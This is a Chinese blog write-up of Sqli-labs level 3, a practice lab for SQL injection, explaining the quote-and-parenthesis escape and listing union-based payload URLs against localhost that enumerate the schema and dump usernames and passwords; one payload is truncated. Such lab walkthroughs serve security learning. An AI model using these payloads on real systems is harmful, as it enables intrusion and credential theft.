Sqli-labs 3
2021/8/23 19:07:07
本文主要是介绍Sqli-labs 3,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
1.找注入点
这一关的名字叫做 quotes with twist ,扭曲的引号,为什么这么说呢,
我们先来看看测试报错,后面加上双引号,可以看到没报错
后面加上' 报错,这里不注意看这个报错信息的话,找到注入点直接上payload会发现还是报错
这里就出现所谓的扭曲了,注意看报错返回的),括号,在sql语法中加入了(),对传入参数$id的引用
来看看源码,果然是有括号的
2.构造payload
接下来就可以根据这点来构造payload了,之前我们已经知道他查询是3个字段了,就不在从头开始探查了
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,2,3 --+
爆数据库名
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,database(),(select group_concat(schema_name) from
爆表名
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(table_name) from information_schema.tables where table_schema = "security") --+
爆字段
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(column_name) from information_schema.columns where table_name = "users") --+
爆数据
http://127.0.0.1/sql/Less-3/?id=-2') union select 1,NULL,(select group_concat(username,0x3a,password) from users ) --+
最关键的还是要找到注入点和绕过方式~~
这篇关于Sqli-labs 3的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-29RocketMQ底层原理资料详解:新手入门教程
- 2024-11-29RocketMQ源码资料解析与入门教程
- 2024-11-29[开源]6.1K star!这款电视直播源神器真的太赞啦!
- 2024-11-29HTTP压缩入门教程:轻松提升网页加载速度
- 2024-11-29JWT开发入门指南
- 2024-11-28知识管理革命:文档软件的新玩法了解一下!
- 2024-11-28低代码应用课程:新手入门全攻略
- 2024-11-28哪些办公软件适合团队协作,且能够清晰记录每个阶段的工作进展?
- 2024-11-28全栈低代码开发课程:零基础入门到初级实战
- 2024-11-28拖动排序课程:轻松掌握课程拖动排序功能